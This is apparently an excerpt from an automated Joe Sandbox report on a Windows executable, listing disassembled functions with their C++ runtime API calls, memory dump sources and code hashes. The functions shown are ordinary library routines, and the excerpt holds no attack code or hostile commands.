                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 009391DD
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 009391E7
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00939238
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00939258
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00939276
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 00939137
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00939141
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 00939192
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 009391B2
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009391D0
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: b1148b3aa91298e6395617af86bcb88ed99e15528a324aea91af67eaca4ffa19
                                      • Instruction ID: 9c100030686e82271f287ecee1610612dde66527aed80ea6af96138ea52abe9e
                                      • Opcode Fuzzy Hash: b1148b3aa91298e6395617af86bcb88ed99e15528a324aea91af67eaca4ffa19
                                      • Instruction Fuzzy Hash: F111A0719042259BCF04EFA8C856BEE77B9AF84320F240409E415BB3E1CF749E40CB91
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,009661C8,009763D6,?,?,0095833C,?,?,?,?,?,008B1F07,?,?), ref: 00974C02
                                      • _free.LIBCMT ref: 00974C37
                                      • _free.LIBCMT ref: 00974C5E
                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 00974C6B
                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 00974C74
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 74afc88dad0f97907e3946301c8ad8a754ff37bb48ef075fa8c924dee49dcb37
                                      • Instruction ID: 5c01ef96a55a0c5ed0964bafa4982ab42b3073f64d6d933237dd555b9724812f
                                      • Opcode Fuzzy Hash: 74afc88dad0f97907e3946301c8ad8a754ff37bb48ef075fa8c924dee49dcb37
                                      • Instruction Fuzzy Hash: 13017D33146A407782036F795D4AEAF126EEBC1B7072DC426F54CD2193EF788D015121
                                      APIs
                                        • Part of subcall function 00943309: TlsGetValue.KERNEL32(?,?,0094274B,00943834,00000000,?,00942729,?,?,?,00000000,?,00000000), ref: 0094330F
                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 009484FF
                                        • Part of subcall function 00952C40: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00952C67
                                        • Part of subcall function 00952C40: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00952C80
                                        • Part of subcall function 00952C40: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00952CF6
                                        • Part of subcall function 00952C40: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00952CFE
                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0094850D
                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00948517
                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00948521
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094853F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                      • String ID:
                                      • API String ID: 4266703842-0
                                      • Opcode ID: e44b77997f5b2cdb476cdcbb2ca627dc7a73014219d5b8302b215514749163c0
                                      • Instruction ID: 947b1da88de09bde09c0ae5383bdbfa98c04253675cd2517c15bf03d9b76acc7
                                      • Opcode Fuzzy Hash: e44b77997f5b2cdb476cdcbb2ca627dc7a73014219d5b8302b215514749163c0
                                      • Instruction Fuzzy Hash: 79F02BB1A0011437CB25FB75D802E6FB7695FD1B14B04005AF80193152DF349E05C7C2
                                      APIs
                                      • _free.LIBCMT ref: 00970ABC
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 00970ACE
                                      • _free.LIBCMT ref: 00970AE1
                                      • _free.LIBCMT ref: 00970AF2
                                      • _free.LIBCMT ref: 00970B03
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 904fdfa428a723eb72d90d0763198e8f21e3a8561269b6924e10f03ac2abee14
                                      • Instruction ID: 1355bf91686f28a1044c2ec37b9301a4775403feff2e3b5fae2157a7538d05da
                                      • Opcode Fuzzy Hash: 904fdfa428a723eb72d90d0763198e8f21e3a8561269b6924e10f03ac2abee14
                                      • Instruction Fuzzy Hash: B8F0BEB28AAA20DB8B45BF18FD259083BA6F744B2034A8117F41C522B1D7711A81EB84
                                      APIs
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 0091159E
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00911609
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name
                                      • String ID: ThisPointer:$ValueNames
                                      • API String ID: 1734802720-2375088429
                                      • Opcode ID: 2334d14611d41c6027e768080081177ffae0da9dd6d754b85b3cd0c4b7d39a92
                                      • Instruction ID: bf9835c14fbb94ddfeb0935437bd2b0402a66611070016a29adaea612f2650c9
                                      • Opcode Fuzzy Hash: 2334d14611d41c6027e768080081177ffae0da9dd6d754b85b3cd0c4b7d39a92
                                      • Instruction Fuzzy Hash: 345129753043486BC7219F249C81EA7BBEAAFD5748B08891DFA8687342E773E948C751
                                      APIs
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 009113AE
                                      • ___std_type_info_name.LIBVCRUNTIME ref: 00911419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ___std_type_info_name
                                      • String ID: ThisPointer:$ValueNames
                                      • API String ID: 1734802720-2375088429
                                      • Opcode ID: 473ec49efa4597c8e96a63fe44f3734e3515c56efe71b2c6ed9bb546125aa2ff
                                      • Instruction ID: 83001f0db5aacbce270158b51fed6b4d41b25397fad5cf08ad5c410e32113d2f
                                      • Opcode Fuzzy Hash: 473ec49efa4597c8e96a63fe44f3734e3515c56efe71b2c6ed9bb546125aa2ff
                                      • Instruction Fuzzy Hash: 875149313043447BC7219F24CC81BA7BBEAAF85B08B04885DFA9987752EB32E949C751
                                      APIs
                                      • _strpbrk.LIBCMT ref: 0097C12A
                                      • _free.LIBCMT ref: 0097C247
                                        • Part of subcall function 0096595F: IsProcessorFeaturePresent.KERNEL32(00000017,00965931,?,?,008B1F07,?,?,00000016,?,?,0096593E,00000000,00000000,00000000,00000000,00000000), ref: 00965961
                                        • Part of subcall function 0096595F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00965983
                                        • Part of subcall function 0096595F: TerminateProcess.KERNEL32(00000000), ref: 0096598A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                      • String ID: *?$.
                                      • API String ID: 2812119850-3972193922
                                      • Opcode ID: f2df130ed16357207f7c97ee9f8fdf62b892ec6658758b5bbc8db2dc931dae17
                                      • Instruction ID: 8f03ab1541992c327676a922b7a86cd7ffcf4b69252f14a3f2a3db7e55070bbc
                                      • Opcode Fuzzy Hash: f2df130ed16357207f7c97ee9f8fdf62b892ec6658758b5bbc8db2dc931dae17
                                      • Instruction Fuzzy Hash: 905184B6E04109EFDF14DFA8C881AADB7F9EF88310F25816DE858E7341D6359E018B50
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F8254
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                      • API String ID: 2005118841-1139078987
                                      • Opcode ID: 3ab670a428f689d73132d5955854bd66b1277beaa995bd037edc519571015849
                                      • Instruction ID: 8240a50a6ae42132facc0092266360d67c72846398a30f6d1fb3f8fa83e331d3
                                      • Opcode Fuzzy Hash: 3ab670a428f689d73132d5955854bd66b1277beaa995bd037edc519571015849
                                      • Instruction Fuzzy Hash: D7518D71E04218EFDB11DFA8CC45FDEBBB8FB59714F0041AAE908E7381DA705A048BA1
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\8AbMCL2dxM.exe,00000104), ref: 009700B2
                                      • _free.LIBCMT ref: 0097017D
                                      • _free.LIBCMT ref: 00970187
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\8AbMCL2dxM.exe
                                      • API String ID: 2506810119-3959656167
                                      • Opcode ID: f727fc398c5f4e622d285736ab80037d8d4b0e7b5e0d230be241b94482d8f0fb
                                      • Instruction ID: 499aca89f80e98d86825eb6c288c35688fb2a4afcb1759941665700e99042009
                                      • Opcode Fuzzy Hash: f727fc398c5f4e622d285736ab80037d8d4b0e7b5e0d230be241b94482d8f0fb
                                      • Instruction Fuzzy Hash: 85317072A49218EFDB21EF99DD85A9EBBFCEBC5710F508067F80897211D6708E41DB60
                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 00984BCF
                                      • make_shared.LIBCPMT ref: 00984C1A
                                        • Part of subcall function 009848AF: __EH_prolog3.LIBCMT ref: 009848B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: H_prolog3H_prolog3_catchmake_shared
                                      • String ID: MOC$RCC
                                      • API String ID: 1798871530-2084237596
                                      • Opcode ID: 4c5c2420946bbbeb477a1cf8dca4bf4139c10d7cc5479f35cb85011fbf5859f6
                                      • Instruction ID: 3e0bfef0d9c49179b65406f811ba9c25dda7c1043cd3fe5e7002bea6630cf6ef
                                      • Opcode Fuzzy Hash: 4c5c2420946bbbeb477a1cf8dca4bf4139c10d7cc5479f35cb85011fbf5859f6
                                      • Instruction Fuzzy Hash: DDF06D74A12219CFCB16FF58C553A9D3B6CEF81782B458090F8406B321CB789E85CBA6
                                      APIs
                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00950284
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00950297
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 009502A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                      • String ID: pContext
                                      • API String ID: 1990795212-2046700901
                                      • Opcode ID: b582de5e4e9c3401dad825273fb1ef11555c1111ae6c63389d21fe60bc6fe4d5
                                      • Instruction ID: f030fd20e254a249dec6207c28f947745d65ee5d0dff33397211c3321bf086dc
                                      • Opcode Fuzzy Hash: b582de5e4e9c3401dad825273fb1ef11555c1111ae6c63389d21fe60bc6fe4d5
                                      • Instruction Fuzzy Hash: DAE09236B0021467CB04FBA9E84AE9EB7AD9FC4724B444065A911A3245EF74AE05C7D0
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00946973
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00946981
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                      • String ID: pScheduler$version
                                      • API String ID: 1687795959-3154422776
                                      • Opcode ID: 366ebfa20a644627defe5b7dd5b351ca74b5ff7918db4ad110c0e578f1e239cb
                                      • Instruction ID: 0235117a89dcb0eb60e84b2020c24514b5be5f0fddf5b34b50652a0d33819a77
                                      • Opcode Fuzzy Hash: 366ebfa20a644627defe5b7dd5b351ca74b5ff7918db4ad110c0e578f1e239cb
                                      • Instruction Fuzzy Hash: 74E08C70900208B6CF14FAA9D84BFDC37A85BA534DF008425BA01210D99BF8A699CB82
                                      APIs
                                      • GetLastError.KERNEL32(?,Dflt,00959A43,?,009C9AE8,?,?,?,?,?,?,?), ref: 0095AB18
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095AB26
                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 0095AB2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast$Value___vcrt_
                                      • String ID: Dflt
                                      • API String ID: 483936075-3880269418
                                      • Opcode ID: 421be3be6a7088ed49d3933e5077f06a37c04c32583487c60d72a3a541365bfb
                                      • Instruction ID: 56b90e72b9a1918188c26504336b09c7a6b512777fdaaf94f1d4909172411a89
                                      • Opcode Fuzzy Hash: 421be3be6a7088ed49d3933e5077f06a37c04c32583487c60d72a3a541365bfb
                                      • Instruction Fuzzy Hash: FCD01236628212578A105F7AFC199A67BABE7C13337184732F120C3094D778944AA6A0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: a3d52ccceee4d5b79723829a6409bfa81b0500304f01b07d1e3e07d20a0b1bb6
                                      • Instruction ID: 81283f3a03381712b6b13994abb53c4234dde39cd8db04f2b0ee83678e6ccff4
                                      • Opcode Fuzzy Hash: a3d52ccceee4d5b79723829a6409bfa81b0500304f01b07d1e3e07d20a0b1bb6
                                      • Instruction Fuzzy Hash: D6A17873900B869FEB26CF28C891BAEBBE5FF51354F18856DE4888B242C7389D41C751
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strcspn$H_prolog3_ctype
                                      • String ID:
                                      • API String ID: 838279627-0
                                      • Opcode ID: 6632ad230f410fcf079228f2070d0198ea47a9dd295bada47b4430f83a8309aa
                                      • Instruction ID: 57bf25d39c82b6c8ce00bcdb1a37bcefe24fbd49c6fab456be63e3de322990b8
                                      • Opcode Fuzzy Hash: 6632ad230f410fcf079228f2070d0198ea47a9dd295bada47b4430f83a8309aa
                                      • Instruction Fuzzy Hash: 43B167B1D012599FDF14DFA8D984AEEBBB9FF48310F144019E805AB219D730AE46CFA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strcspn$H_prolog3_ctype
                                      • String ID:
                                      • API String ID: 838279627-0
                                      • Opcode ID: a24061a6b967396983c595ac9e9ba4856edb8b514c14cbf54edc91e34f1aa18a
                                      • Instruction ID: 3f3e84927096fe308481598a46e258fc9d6c2d6d7560090d01a2b7c0f6cacf03
                                      • Opcode Fuzzy Hash: a24061a6b967396983c595ac9e9ba4856edb8b514c14cbf54edc91e34f1aa18a
                                      • Instruction Fuzzy Hash: 52B179B1D01259DFDF14DFA8D884AEEBBB9FF48310F144419E805AB256D730AE45CBA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _strcspn$H_prolog3_ctype
                                      • String ID:
                                      • API String ID: 838279627-0
